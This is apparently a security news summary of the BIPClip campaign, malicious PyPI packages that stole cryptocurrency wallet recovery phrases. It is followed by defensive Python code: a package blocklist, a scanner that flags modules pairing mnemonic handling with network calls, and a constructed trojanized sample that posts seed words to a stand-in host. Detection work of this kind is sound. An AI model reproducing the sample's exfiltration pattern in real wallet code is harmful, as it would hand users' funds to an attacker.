March 12, 2024 at 08:27AM
Threat hunters have discovered a set of seven malicious packages on PyPI that target cryptocurrency wallets by stealing BIP39 mnemonic phrases, the recovery seeds from which a wallet's private keys are derived, so whoever obtains the phrase controls the funds. The campaign, codenamed BIPClip, has been active since December 2022 and has raised concerns about supply chain attacks on crypto assets. The attackers crafted the packages carefully to avoid detection.
Key takeaways:
1. The software supply chain attack campaign named BIPClip targeted cryptocurrency wallets by using packages on the Python Package Index (PyPI).
2. The campaign, active since December 4, 2022, carefully disguised malicious functionality within certain packages, including mnemonic_to_address, public-address-generator, and erc20-scanner, to exfiltrate mnemonic phrases.
3. The package hashdecrypts contains harvesting code near-identical to that in the other packages and references a GitHub profile named “HashSnake,” indicating a prolonged campaign by the same operator.
4. Threat actors behind the campaign maintain a presence on Telegram and YouTube, using legitimate services like GitHub as conduits to distribute malware.
5. Abandoned projects within open-source repositories serve as attractive vectors for threat actors to publish trojanized versions, potentially leading to large-scale supply chain attacks.
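The two practical checks that follow from the points above, as an added example rather than the packages' real code or any vendor's tooling: a requirements blocklist match that applies the PEP 503 name normalization pip uses (so `mnemonic_to_address` and `Mnemonic-To-Address` compare equal, a mismatch that defeats naive string blocklists), and an AST heuristic that flags a module which both handles mnemonic material and makes an outbound network call, the conjunction that distinguishes a trojanized wallet helper from a benign one. The blocklist holds only the package names this page mentions, the network-call table is deliberately shallow, and the two sample modules (including the `example.invalid` endpoint) are constructed for the demonstration.

```python
"""Two lightweight checks for the BIPClip class of PyPI supply-chain attack.
Added illustration only; not the packages' code and not any vendor's tool."""
import ast
import re

# Package names mentioned on this page; the campaign had seven, so this is an
# illustrative blocklist, not an authoritative one.
BIPCLIP_PACKAGES = {
    "mnemonic_to_address", "public-address-generator",
    "erc20-scanner", "hashdecrypts",
}


def normalize(name: str) -> str:
    """PEP 503 project-name normalization (what pip and PyPI compare on)."""
    return re.sub(r"[-_.]+", "-", name).lower()


_BLOCKLIST = {normalize(n) for n in BIPCLIP_PACKAGES}


def find_blocked(requirements: str) -> list[str]:
    """Return the requirement lines whose project name is blocklisted."""
    hits = []
    for raw in requirements.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # blank, comment, or pip option
            continue
        # The project name ends at the first extras/version/marker character.
        name = re.split(r"[\s\[<>=!~;@]", line, maxsplit=1)[0]
        if normalize(name) in _BLOCKLIST:
            hits.append(line)
    return hits


# Identifiers and strings suggesting the module touches seed material.
MNEMONIC_TERMS = re.compile(r"mnemonic|seed.?phrase|bip.?39|wordlist", re.I)

# Dotted call names that send data off-host. Deliberately shallow: a real
# scanner would also resolve import aliases and wrapper functions.
NETWORK_CALLS = {
    "requests.post", "requests.get", "urllib.request.urlopen", "urlopen",
    "socket.socket", "http.client.HTTPSConnection", "HTTPSConnection",
}


def _dotted(node: ast.AST) -> str:
    """Render a.b.c from an Attribute/Name chain; '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_module(source: str) -> dict:
    """Collect mnemonic references and network calls found in `source`."""
    tree = ast.parse(source)
    mnemonic_refs, network_calls = [], []
    for node in ast.walk(tree):
        if isinstance(node, ast.Name) and MNEMONIC_TERMS.search(node.id):
            mnemonic_refs.append(node.id)
        elif isinstance(node, ast.Attribute) and MNEMONIC_TERMS.search(node.attr):
            mnemonic_refs.append(node.attr)
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and MNEMONIC_TERMS.search(node.value)):
            mnemonic_refs.append(node.value)
        elif isinstance(node, ast.Call):
            callee = _dotted(node.func)
            if callee in NETWORK_CALLS:
                network_calls.append(callee)
    return {"mnemonic_refs": mnemonic_refs, "network_calls": network_calls}


def looks_like_exfil(source: str) -> bool:
    """A wallet helper that also talks to the network deserves a human look."""
    found = scan_module(source)
    return bool(found["mnemonic_refs"]) and bool(found["network_calls"])


# Constructed samples for this demonstration; not code from the real packages.
BENIGN = '''
from mnemonic import Mnemonic

def derive(words: str) -> bytes:
    # Derive the BIP39 seed locally; nothing leaves the process.
    return Mnemonic("english").to_seed(words)
'''

TROJANIZED = '''
import requests
from mnemonic import Mnemonic

def derive(words: str) -> bytes:
    seed = Mnemonic("english").to_seed(words)
    # Hypothetical exfiltration endpoint, invented for this example.
    requests.post("https://example.invalid/collect", data={"m": words})
    return seed
'''
```

Run `find_blocked` over a project's requirements file and `looks_like_exfil` over each module of a newly added dependency; a hit from the second check is a triage signal, not a verdict, because legitimate wallet libraries that fetch balances will also match both halves.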